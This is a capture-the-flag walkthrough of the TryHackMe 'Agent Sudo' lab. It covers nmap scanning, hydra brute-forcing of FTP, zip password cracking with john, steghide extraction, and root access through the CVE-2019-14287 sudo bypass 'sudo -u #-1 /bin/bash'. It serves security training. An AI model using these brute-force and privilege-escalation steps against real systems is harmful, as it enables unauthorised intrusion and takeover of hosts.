TryHackMe - Agent Sudo
Description
You found a secret server located under the deep sea.
Your task is to hack inside the server and reveal the truth.
Port Scan
We start off with a nmap scan to identify the open ports.
1
nmap -sV -sC -v 10.10.224.246
From the scan we get three open ports.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
Scanning 10.10.224.246 [1000 ports]
Discovered open port 22/tcp on 10.10.224.246
Discovered open port 21/tcp on 10.10.224.246
Discovered open port 80/tcp on 10.10.224.246
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
902/tcp filtered iss-realsecure
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We prioritized starting the investigation with the HTTP protocol on port 80.
Http_80
Let’s try spoofing as C and get the same URL with curl.
-A allows us to spoof the user agent and -L follows any redirects.
Now we have a user chris but not sure it’s for ssh or ftp.
ftp-21
Brute-force
1
2
# hydra -L users.txt -P passwords.txt <IP> ftp
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.55.182 ftp
Now we have some valid credentials:
- username:
chris - password:
crystal1
ftp chris@10.10.55.182
we get the file and read the contents: 
Will have to go back and get the images. We run binwalk on the png file which is the most likely to contain some hidden files. We get these three files:
- 365
- 365.zlib
- 8702.zip
- To_agentR.txt
The zip file is encrypted. We can use john to crack the password:
1
2
3
4
5
# convert the file to format that john can understand
zip2john 8702.zip > forjohn
# now we let John do his thing
john forjohn.txt
Password = alien
Unzip the files. You may get errors extracting the files using unzip, if so, use 7z e zipfile
1
7z e 8702.zip
Use CyberChef to decode
QXJlYTUx = Area51 = password for steg.
We can now use steghide on the image that we never used.
1
2
3
4
5
6
7
# Use this command to check if we have any hiden msg
steghide info cute-alien.jpg
# then we use the extract command
steghide extract -sf cute-alien.jpg
cat message.txt
Details
With these details and the unused port (22 = ssh), we can try logging in.
Details
Privilege escalation
Google search for the exploit: CVE:2019-14287
In the exploit page, we get:
1
2
'sudo -u #-1 /bin/bash'
#Read the root flag.







